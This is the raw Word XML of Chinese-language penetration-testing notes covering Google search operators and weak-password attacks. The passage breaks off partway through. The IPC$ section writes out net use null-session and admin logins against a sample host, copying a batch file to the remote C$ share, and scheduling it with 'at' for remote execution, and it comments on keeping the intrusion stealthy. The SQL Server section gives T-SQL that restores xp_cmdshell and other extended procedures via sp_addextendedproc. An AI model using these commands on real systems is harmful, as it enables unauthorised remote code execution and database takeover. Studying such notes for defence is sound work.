    <w:p w:rsidR="00947920" w:rsidRDefault="00947920" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的搜索是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的搜索逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947920" w:rsidRDefault="00947920" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and or + -</w:t>
      </w:r>
      <w:r w:rsidR="0034334F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714426" w:rsidRDefault="00714426" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="002C58A7" w:rsidRDefault="002C58A7" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高级语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A451C" w:rsidRDefault="001A451C" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6D4F" w:rsidRPr="006D0F73" w:rsidRDefault="006D0F73" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intitle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6D4F" w:rsidRDefault="0034334F" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034334F" w:rsidRDefault="0034334F" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D3BCC" w:rsidRDefault="008D3BCC" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034334F" w:rsidRDefault="0034334F" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>related</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034334F" w:rsidRPr="006D0F73" w:rsidRDefault="0034334F" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>filetype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC6D4F" w:rsidRDefault="00DC6D4F" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00883F18" w:rsidRDefault="00883F18" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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0F6B" w:rsidRPr="00C05EE0" w:rsidRDefault="00DA7B0F" w:rsidP="008C0F6B">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc468296468"/>
      <w:r w:rsidRPr="00C05EE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>弱口令攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00F14EA2" w:rsidRDefault="00F14EA2" w:rsidP="008C0F6B"/>
    <w:p w:rsidR="00F14EA2" w:rsidRDefault="00F14EA2" w:rsidP="00E3344E">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc468296469"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r w:rsidR="00233090">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与空连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00B86139" w:rsidRDefault="00B86139" w:rsidP="00233090">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t xml:space="preserve">IPC$(Internet Process Connection) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是共享</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名管道</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的资源，它是为了让</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00281AE3">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="FF0000"/>
          </w:rPr>
          <w:t>进程间通信</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00281AE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>而开放的命名管道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPC$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NT/2000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一项新功能，它有一个特点，即在同一时间内，两个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间只允许建立一个连接。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NT/2000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在提供了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ipc$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能的同时，在初次</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E66158">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>安装系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时还打开了</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E66158">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>默认共享</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即所有的逻辑共享</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (c$,d$,e$ …… ) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和系统目录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> winnt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> windows(admin$) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C"/>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t xml:space="preserve">net use \\192.168.1.203\ipc$ “” /user:””                   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t>net use \\192.168.1.203\ipc$ “test” /user:administrator       IPC$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C"/>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t xml:space="preserve">net use z: \\192.168.1.203\c$                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>映射到本地</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t xml:space="preserve">copy c:\test.bat \\192. 168.1.203\c$ </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令实现上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C"/>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t xml:space="preserve">net time \\192.168.1.20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目标机时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t>at \\192.168.1.203 21:05 c:\test.b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定时执行任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C"/>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t xml:space="preserve">net share </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看共享</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">net share  /del </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除共享</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t>C:\Users\xiaopo&gt;net use \\192.168.193.129\ipc$ /del</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t xml:space="preserve">\\192.168.193.129\ipc$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经删除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删除连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t>net stop server /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禁用</w:t>
      </w:r>
      <w:r>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C"/>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入侵</w:t>
      </w:r>
      <w:r>
        <w:t>(win2k3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入侵了</w:t>
      </w:r>
      <w:r>
        <w:t>win 7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，</w:t>
      </w:r>
      <w:r>
        <w:t>win2k3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网络连接显示情况：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5279390" cy="1405890"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="图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6C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网络连接显示情况：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3433445" cy="741680"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片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6C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这让入侵更加私密，为何不让目标机</w:t>
      </w:r>
      <w:r>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也显示当前网络连接？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C"/>
    <w:p w:rsidR="0067646C" w:rsidRDefault="0067646C" w:rsidP="0067646C">
      <w:pPr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color w:val="FF0000"/>
        </w:rPr>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>开了防火墙的话，则不能连接成功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067646C" w:rsidRPr="0067646C" w:rsidRDefault="0067646C" w:rsidP="00233090">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B86139" w:rsidRDefault="00B86139" w:rsidP="00233090">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="00F50F75">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc468296470"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 211.x.x.119 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果更改了默认端口号，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>open 211.x.x.119 21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有一个特殊的：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Serv-U</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B"/>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="00F50F75">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc468296471"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL SERVER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，主要有两种角色类型：服务器角色与数据库角色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般攻击者在扫描或注入攻击的时候，大多数会遇到三种角色：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>db_owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的缩写，为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的默认系统帐号，具有最高权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B"/>
    <w:p w:rsidR="008C0F6B" w:rsidRPr="00A37BF1" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL SERVER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select @@version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B"/>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="00114FB6">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc468296472"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRPr="00A87B27" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句见黑客渗透笔记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00F855A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r w:rsidR="00C7748B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidR="00F855A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此外，在网上整理了一些恢复扩展：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sp_addextendedproc</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恢复大部分常用存储扩展</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>得先利用最顶上的语句恢复自己</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>use master    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_dirtree,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_enumgroups,'xplog70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_loginconfig,'xplog70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
